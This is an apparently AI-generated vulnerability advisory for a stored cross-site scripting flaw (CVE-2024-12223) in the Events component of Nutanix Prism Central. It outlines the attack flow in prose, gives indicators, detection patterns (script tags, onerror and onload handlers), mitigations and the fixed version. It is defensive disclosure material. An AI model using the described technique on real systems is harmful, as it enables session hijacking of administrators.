CVE-2024-12223 Overview
A stored cross-site scripting (XSS) vulnerability has been identified in Nutanix Prism Central versions prior to 2024.3.1. This vulnerability exists within the Events component and allows attackers to inject malicious scripts that persist in the application. When a victim user accesses the compromised Events component, the malicious script executes within their browser session, potentially leading to session hijacking and unauthorized actions performed under the victim's security context.
Critical Impact
Attackers can hijack user sessions and perform actions in the victim's security context, potentially gaining administrative control over the Prism Central infrastructure management platform.
Affected Products
- Nutanix Prism Central versions prior to 2024.3.1
Discovery Timeline
- 2025-08-20 - CVE-2024-12223 published to NVD
- 2025-08-20 - Last updated in NVD database
Technical Details for CVE-2024-12223
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as stored cross-site scripting. The flaw exists in the Events component of Nutanix Prism Central, a centralized management solution for Nutanix infrastructure.
Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server side, affecting all users who access the compromised resource. In this case, an attacker can inject malicious JavaScript code through the Events component, which is then stored and rendered to other users without proper sanitization or encoding.
The impact extends beyond simple script execution—successful exploitation enables session hijacking, allowing attackers to impersonate legitimate users. Given that Prism Central is used for infrastructure management, compromising an administrator's session could provide attackers with extensive control over the virtualized environment.
Root Cause
The root cause of this vulnerability is improper input validation and output encoding within the Events component. User-supplied input is stored without adequate sanitization and subsequently rendered in web pages without proper HTML encoding. This allows JavaScript code embedded in the input to execute when the page is loaded by other users.
Attack Vector
The attack is network-based and requires user interaction. An attacker must first inject a malicious payload into the Events component, which requires some level of access to the Prism Central interface. Once the payload is stored, any authenticated user who views the affected Events page will have the malicious script execute in their browser context.
The attack scenario typically unfolds as follows:
- The attacker identifies an input field within the Events component that does not properly sanitize user input
- A malicious JavaScript payload is crafted and submitted, causing it to be stored in the application database
- When a victim user (particularly an administrator) navigates to the Events section, the stored payload executes in their browser
- The attacker's script can then steal session tokens, perform actions on behalf of the user, or redirect to phishing pages
For technical details regarding this vulnerability, refer to the Missing Link Security Advisory.
Detection Methods for CVE-2024-12223
Indicators of Compromise
- Unexpected or malformed entries in the Events component containing HTML or JavaScript code
- User reports of unusual behavior when accessing the Events section
- Session tokens appearing in unexpected network requests or logs
- Browser console errors indicating script execution from untrusted sources
Detection Strategies
- Monitor web application logs for suspicious input patterns containing <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads
- Implement Content Security Policy (CSP) headers and monitor for violations
- Deploy web application firewall (WAF) rules to detect and block XSS payloads targeting the Events component
- Review Prism Central audit logs for unusual administrative actions that may indicate session hijacking
Monitoring Recommendations
- Enable detailed logging for the Events component and review for anomalous entries
- Configure alerts for CSP violation reports indicating potential XSS attempts
- Monitor for unusual session activity patterns such as simultaneous logins from different locations
- Implement user behavior analytics to detect actions inconsistent with normal administrator patterns
How to Mitigate CVE-2024-12223
Immediate Actions Required
- Upgrade Nutanix Prism Central to version 2024.3.1 or later immediately
- Review the Events component for any existing malicious entries and remove them
- Invalidate all active sessions and require users to re-authenticate after patching
- Implement Content Security Policy headers to mitigate impact of any similar vulnerabilities
Patch Information
Nutanix has addressed this vulnerability in Prism Central version 2024.3.1. Organizations should upgrade to this version or later to remediate the stored XSS vulnerability. For detailed upgrade instructions and additional security guidance, consult the Missing Link Security Advisory and Nutanix official documentation.
Workarounds
- Restrict access to the Prism Central web interface to trusted networks only using network segmentation or firewall rules
- Implement additional authentication controls such as multi-factor authentication (MFA) to reduce the impact of potential session hijacking
- Deploy a web application firewall (WAF) with XSS protection rules as an interim measure
- Limit administrative privileges using role-based access control to minimize the impact of compromised sessions
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
